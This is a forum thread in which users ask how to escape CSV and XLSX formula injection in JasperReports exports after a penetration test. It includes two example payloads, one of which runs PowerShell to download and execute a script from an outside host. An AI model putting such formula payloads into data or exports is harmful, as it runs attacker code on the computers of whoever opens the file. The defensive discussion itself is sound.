Prevent CSV injection

[cardel]

Is it possible to set some properties or data filters to prevent CSV injection?

I am exporting data from JSON collection to report in CSV format. Penetration test found out that there can be a problem with CSV injection.

Someone can add "=cmd|' /C notepad'!'A1'" to exported field and this will cause that excel can open notepad or other scripts.

Is it possible to automatically escape some special characters in fields?

I tried 

csvExporterConfiguration.setForceFieldEnclosure(true);[/code]

But with no effect. I need to escape +, -, =, @, | characters. Can I do it somehow in jasper reports or I should do this data modification before exporting report?

Regards

Karel

[asookaziangmail.com]

Interested in any answers/guidance as well on this topic of formula injection in CSV and XLSX use cases.

Reference: https://pentestmag.com/formula-injection/

Is it possible to set some config/property such that the JRXlsxExporter will auto prepend a space or apostrophe in front of "=cmd***" in any textFields that are saved as such in the db tables queried by the report query?

For example, assume Person.FirstName value in db table is the following:

=cmd|'/Cpowershell Import-Module BitsTransfer; Start-BitsTransfer -source https://141.io/shell.ps; Invoke-Item shell.ps;'!z

which could be a malicious download script attempt in formula field.  Would it be possible to prevent such attack specifically in the fillReport() intercept or similar?

This is "supposed" to solve the problem with Csv (can you provide an example?  original poster says doesn't work):

​http://jasperreports.sourceforge.net/api/net/sf/jasperreports/export/SimpleCsvExporterConfiguration.html#setForceFieldEnclosure-java.lang.Boolean-

Unfortunately, the same APIs don't exist for http://jasperreports.sourceforge.net/api/net/sf/jasperreports/export/SimpleXlsxExporterConfiguration.html

Why doesn't the same APIs exist for force field enclosure for XLSX?